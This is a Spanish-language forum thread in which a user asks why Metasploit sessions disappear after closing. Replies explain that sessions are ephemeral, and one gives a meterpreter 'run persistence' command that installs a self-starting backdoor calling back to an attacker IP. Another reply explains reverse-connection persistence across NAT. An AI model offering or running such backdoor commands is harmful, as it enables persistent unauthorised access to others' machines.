Ante todo Buenas !!!!!
Tengo una pequeña consulta logro infectar una maquina virtual o cualquier maquina en casa y todo bien creo shell hago background......
pero cierro todo
y al momento de buscar las sessiones en metasploit no se guardan a que se debe se supone que desde q logras infectar la credencial o session se queda guardada!!!!??
Por que no me aparece hago mal algo ???'?'
Espero me puedan ayudar
(https://i.ibb.co/YWjMP7J/fuck.png)
Dejame que entienda la pregunta. ¿Abres la sesion, la cierras y despues no aparece en la lista de conexiones abiertas? ¿Es eso?
Hola,
Lo que sucede es que cuando tu abres otro msfconsole en otra terminal, metasploit entiende que vas a iniciar una nueva sesion, por lo que te sale que no hay sesiones, en la misma terminal donde ya tienes iniciado el meterpreter, tira el comando sessions y veras que ahi si te salen las sesiones.
Si quieres crear un persistent session, lanzale un comando como este en meterpreter run persistence -U -i 5 -p 443 -r 192.168.1.71 y reemplazar el puerto y la ip
Saludos.
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Dejame que entienda la pregunta. ¿Abres la sesion, la cierras y despues no aparece en la lista de conexiones abiertas? ¿Es eso?
si asi es
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Hola,
Lo que sucede es que cuando tu abres otro msfconsole en otra terminal, metasploit entiende que vas a iniciar una nueva sesion, por lo que te sale que no hay sesiones, en la misma terminal donde ya tienes iniciado el meterpreter, tira el comando sessions y veras que ahi si te salen las sesiones.
Si quieres crear un persistent session, lanzale un comando como este en meterpreter run persistence -U -i 5 -p 443 -r 192.168.1.71 y reemplazar el puerto y la ip
Saludos.
si lo echo pero cuando abro todo !! no aparecen las sessiones pense q metaesploit las guarda !!!!
Si cierras la sesion, ya no hay sesion abierta. la has cerrado
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Hola,
Lo que sucede es que cuando tu abres otro msfconsole en otra terminal, metasploit entiende que vas a iniciar una nueva sesion, por lo que te sale que no hay sesiones, en la misma terminal donde ya tienes iniciado el meterpreter, tira el comando sessions y veras que ahi si te salen las sesiones.
Si quieres crear un persistent session, lanzale un comando como este en meterpreter run persistence -U -i 5 -p 443 -r 192.168.1.71 y reemplazar el puerto y la ip
Saludos.
si lo echo pero cuando abro todo !! no aparecen las sessiones pense q metaesploit las guarda !!!!
Para eso es el run persistence que te envie, con eso creas un backdoor y la proxima vez que se inicie la maquina, tu podras entrar directamente, te recomiendo leer esta guia por si tienes mas dudas https://www.offensive-security.com/metasploit-unleashed/maintaining-access/
Saludos.
La persistencia que comenta la persona de arriba es a grandes rasgos dejar un meterpreter que se autoejecute en la maquina remota. Si no haces eso, no podrás abrir una nueva sesion, ten en cuenta que las sesiones que abres con metasploit, son efimeras. Explotas un fallo de un programa y en ese momento ejecutas un payload. Esa ejecucion durará lo que estés trabajando con el. Y una vez cerrada la coonexion, no sigue la ejecucion del programa.
Hablando en lenguaje profano, para poder seguir accediendo sin necesidad de explotación (romper el programa en ejecucion cuyo fallo te permite ejecutar instrucciones) tienes que decirle al sistema remoto o bien que abra un puerto al que te puedas conectar tu, o bien que este de forma continua intentando llamarte a ti para que cuando lo requieras puedas usarlo. Las implicaciones de esto son evidentes, si pones un servidor en el otro extremo y está detras de un NAT no podrás acceder a él. Por otro lado si pones un servidor en tu ordenador y estas detras de un NAT, el otro lado no podrá llegar a ti. Tocará hacer un mapeo de puertos en el router.
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
La persistencia que comenta la persona de arriba es a grandes rasgos dejar un meterpreter que se autoejecute en la maquina remota. Si no haces eso, no podrás abrir una nueva sesion, ten en cuenta que las sesiones que abres con metasploit, son efimeras. Explotas un fallo de un programa y en ese momento ejecutas un payload. Esa ejecucion durará lo que estés trabajando con el. Y una vez cerrada la coonexion, no sigue la ejecucion del programa.
Hablando en lenguaje profano, para poder seguir accediendo sin necesidad de explotación (romper el programa en ejecucion cuyo fallo te permite ejecutar instrucciones) tienes que decirle al sistema remoto o bien que abra un puerto al que te puedas conectar tu, o bien que este de forma continua intentando llamarte a ti para que cuando lo requieras puedas usarlo. Las implicaciones de esto son evidentes, si pones un servidor en el otro extremo y está detras de un NAT no podrás acceder a él. Por otro lado si pones un servidor en tu ordenador y estas detras de un NAT, el otro lado no podrá llegar a ti. Tocará hacer un mapeo de puertos en el router.
Muchisisiisisimas gracias de verdad tu respuesta me ayuda mucho de verdad gracias aclaraste mis dudas